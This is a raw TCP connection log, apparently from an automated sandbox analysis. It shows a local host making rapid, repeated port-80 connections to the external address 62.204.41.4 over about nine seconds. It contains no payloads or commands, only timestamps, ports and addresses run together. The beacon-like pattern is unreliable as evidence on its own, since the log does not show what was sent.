                          Feb 7, 2023 20:00:56.667263031 CET4974280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:56.726438999 CET804974262.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:56.728579044 CET804974262.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:56.728652954 CET4974280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:56.838176966 CET4974280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:56.838916063 CET4974380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:56.897670031 CET804974262.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:56.898996115 CET4974280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:56.900239944 CET804974362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:56.901916027 CET4974380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:56.902350903 CET4974380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:56.963887930 CET804974362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:56.967124939 CET804974362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:56.967365980 CET4974380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.073518038 CET4974380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.074635029 CET4974480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.135040998 CET804974362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.135246992 CET4974380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.137984991 CET804974462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.141964912 CET4974480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.142499924 CET4974480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.204029083 CET804974462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.207439899 CET804974462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.207595110 CET4974480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.323312998 CET4974480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.324645996 CET4974580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.384975910 CET804974462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.385025024 CET804974562.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.385133028 CET4974480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.385229111 CET4974580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.394746065 CET4974580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.455444098 CET804974562.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.457775116 CET804974562.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.457984924 CET4974580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.582240105 CET4974580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.583457947 CET4974680192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.643151045 CET804974562.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.643943071 CET4974580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.646279097 CET804974662.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.646410942 CET4974680192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.646912098 CET4974680192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.709091902 CET804974662.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.712091923 CET804974662.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.712630033 CET4974680192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.822938919 CET4974680192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.823654890 CET4974780192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.885341883 CET804974762.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.885809898 CET4974780192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.886349916 CET804974662.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.886492968 CET4974680192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.887103081 CET4974780192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:57.947165012 CET804974762.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.949150085 CET804974762.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:57.949311972 CET4974780192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.058672905 CET4974780192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.060165882 CET4974880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.119796991 CET804974762.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.120002985 CET4974780192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.120944977 CET804974862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.121097088 CET4974880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.128864050 CET4974880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.189838886 CET804974862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.193397999 CET804974862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.193674088 CET4974880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.312197924 CET4974880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.313533068 CET4974980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.373100042 CET804974862.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.373274088 CET4974880192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.376118898 CET804974962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.376302958 CET4974980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.376847982 CET4974980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.439537048 CET804974962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.441658020 CET804974962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.441756964 CET4974980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.558273077 CET4974980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.559550047 CET4975080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.621090889 CET804975062.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.621164083 CET804974962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.621226072 CET4975080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.621273041 CET4974980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.621944904 CET4975080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.684221983 CET804975062.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.685926914 CET804975062.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.686120033 CET4975080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.807406902 CET4975080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.808864117 CET4975180192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.868967056 CET804975062.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.869210958 CET804975162.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.869225025 CET4975080192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.869554043 CET4975180192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.872163057 CET4975180192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:58.932595015 CET804975162.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.934767008 CET804975162.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:58.934895992 CET4975180192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.043762922 CET4975180192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.044867992 CET4975280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.104465961 CET804975162.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.104604959 CET4975180192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.106216908 CET804975262.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.106374025 CET4975280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.119448900 CET4975280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.180921078 CET804975262.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.184709072 CET804975262.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.184799910 CET4975280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.292309046 CET4975280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.293263912 CET4975380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.353882074 CET804975262.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.353959084 CET4975280192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.354581118 CET804975362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.354726076 CET4975380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.355094910 CET4975380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.416547060 CET804975362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.418791056 CET804975362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.418997049 CET4975380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.551306009 CET4975380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.552696943 CET4975480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.612899065 CET804975362.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.613101006 CET4975380192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.614417076 CET804975462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.614607096 CET4975480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.616651058 CET4975480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.678493977 CET804975462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.680761099 CET804975462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.680886984 CET4975480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.791963100 CET4975480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.792956114 CET4975580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.853470087 CET804975562.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.853604078 CET4975580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.853737116 CET804975462.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.854980946 CET4975480192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.855021000 CET4975580192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:59.915539026 CET804975562.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.919234037 CET804975562.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:59.919346094 CET4975580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.029222012 CET4975580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.030014038 CET4975680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.090148926 CET804975562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.090285063 CET4975580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.091609001 CET804975662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.091742992 CET4975680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.094396114 CET4975680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.156018019 CET804975662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.159466028 CET804975662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.160327911 CET4975680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.276499033 CET4975680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.277494907 CET4975780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.337392092 CET804975762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.338087082 CET4975780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.338092089 CET804975662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.338169098 CET4975680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.338640928 CET4975780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.398314953 CET804975762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.400506020 CET804975762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.400656939 CET4975780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.510581970 CET4975780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.511354923 CET4975880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.570646048 CET804975762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.570764065 CET4975780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.572808981 CET804975862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.573007107 CET4975880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.586842060 CET4975880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.648233891 CET804975862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.650304079 CET804975862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.654498100 CET4975880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.765961885 CET4975880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.767050028 CET4975980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.827755928 CET804975862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.827975988 CET4975880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.828425884 CET804975962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.828576088 CET4975980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.829526901 CET4975980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:00.891056061 CET804975962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.893472910 CET804975962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:00.893657923 CET4975980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.010792971 CET4975980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.011584997 CET4976180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.072571039 CET804975962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.072825909 CET4975980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.073199987 CET804976162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.073343039 CET4976180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.073822021 CET4976180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.135385990 CET804976162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.139965057 CET804976162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.140065908 CET4976180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.244966984 CET4976180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.245749950 CET4976280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.306833029 CET804976162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.307041883 CET4976180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.307285070 CET804976262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.307472944 CET4976280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.308697939 CET4976280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.370223045 CET804976262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.373136997 CET804976262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.373297930 CET4976280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.487795115 CET4976280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.488780975 CET4976380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.549297094 CET804976362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.549361944 CET804976262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.549587965 CET4976280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.550107002 CET4976380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.550107002 CET4976380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.610586882 CET804976362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.612922907 CET804976362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.613168001 CET4976380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.729712963 CET4976380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.730566978 CET4976480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.790292025 CET804976362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.790371895 CET4976380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.793095112 CET804976462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.793236971 CET4976480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.795053005 CET4976480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:01.857687950 CET804976462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.859669924 CET804976462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:01.859817028 CET4976480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.030199051 CET4976480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.031290054 CET4976580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.092952013 CET804976462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.092998981 CET804976562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.093235016 CET4976580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.093316078 CET4976480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.096121073 CET4976580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.157862902 CET804976562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.162086964 CET804976562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.162287951 CET4976580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.276860952 CET4976580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.278430939 CET4976680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.338784933 CET804976562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.338967085 CET4976580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.340930939 CET804976662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.341207981 CET4976680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.341784954 CET4976680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.404205084 CET804976662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.408010006 CET804976662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.408297062 CET4976680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.511446953 CET4976680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.512542963 CET4976780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.573864937 CET804976662.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.573894024 CET804976762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.574090004 CET4976680192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.574194908 CET4976780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.575090885 CET4976780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.636591911 CET804976762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.641204119 CET804976762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.641473055 CET4976780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.746608973 CET4976780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.747816086 CET4976880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.808232069 CET804976762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.808444023 CET4976780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.810224056 CET804976862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.810512066 CET4976880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.811172962 CET4976880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.873533010 CET804976862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.876564026 CET804976862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:02.876662970 CET4976880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.982095003 CET4976880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:02.983704090 CET4976980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.043025970 CET804976962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.043181896 CET4976980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.043961048 CET4976980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.044497967 CET804976862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.044583082 CET4976880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.103138924 CET804976962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.107919931 CET804976962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.108084917 CET4976980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.223102093 CET4976980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.224046946 CET4977080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.282480955 CET804976962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.282721996 CET4976980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.285319090 CET804977062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.285619974 CET4977080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.285970926 CET4977080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.347162962 CET804977062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.349364042 CET804977062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.349455118 CET4977080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.467390060 CET4977080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.468770981 CET4977180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.528803110 CET804977062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.528971910 CET4977080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.529253006 CET804977162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.529409885 CET4977180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.532617092 CET4977180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.593183041 CET804977162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.595849991 CET804977162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.596031904 CET4977180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.715229034 CET4977180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.716133118 CET4977280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.776000977 CET804977162.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.776159048 CET4977180192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.778640985 CET804977262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.778764963 CET4977280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.779261112 CET4977280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.841566086 CET804977262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.843966007 CET804977262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:03.844151974 CET4977280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.975300074 CET4977280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:03.976031065 CET4977380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.037540913 CET804977362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.037574053 CET804977262.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.037745953 CET4977280192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.038337946 CET4977380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.038337946 CET4977380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.099762917 CET804977362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.103609085 CET804977362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.103876114 CET4977380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.214126110 CET4977380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.216212034 CET4977480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.275754929 CET804977362.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.277828932 CET804977462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.278042078 CET4977380192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.278086901 CET4977480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.281618118 CET4977480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.343143940 CET804977462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.345859051 CET804977462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.346127987 CET4977480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.450556040 CET4977480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.453031063 CET4977580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.512209892 CET804977462.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.514547110 CET4977480192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.515410900 CET804977562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.515727043 CET4977580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.516284943 CET4977580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.578528881 CET804977562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.580698013 CET804977562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.580943108 CET4977580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.699789047 CET4977580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.701033115 CET4977780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.762290955 CET804977562.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.762362003 CET804977762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.762442112 CET4977580192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.762492895 CET4977780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.763084888 CET4977780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.824553013 CET804977762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.827470064 CET804977762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.830619097 CET4977780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.933696985 CET4977780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.934915066 CET4977880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.994843006 CET804977862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.994987011 CET4977880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.995275974 CET804977762.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:04.995378971 CET4977780192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:04.997292995 CET4977880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.056725979 CET804977862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.060085058 CET804977862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.060285091 CET4977880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.167840004 CET4977880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.168823004 CET4977980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.227994919 CET804977862.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.228199959 CET4977880192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.231514931 CET804977962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.231797934 CET4977980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.232359886 CET4977980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.294585943 CET804977962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.296737909 CET804977962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.296957970 CET4977980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.416882038 CET4977980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.418044090 CET4978080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.479312897 CET804977962.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.479576111 CET4977980192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.480426073 CET804978062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.480608940 CET4978080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.481040001 CET4978080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.543351889 CET804978062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.545506954 CET804978062.204.41.4192.168.2.6
                          Feb 7, 2023 20:01:05.545646906 CET4978080192.168.2.662.204.41.4
                          Feb 7, 2023 20:01:05.659903049 CET4978080192.168.2.662.204.41.4
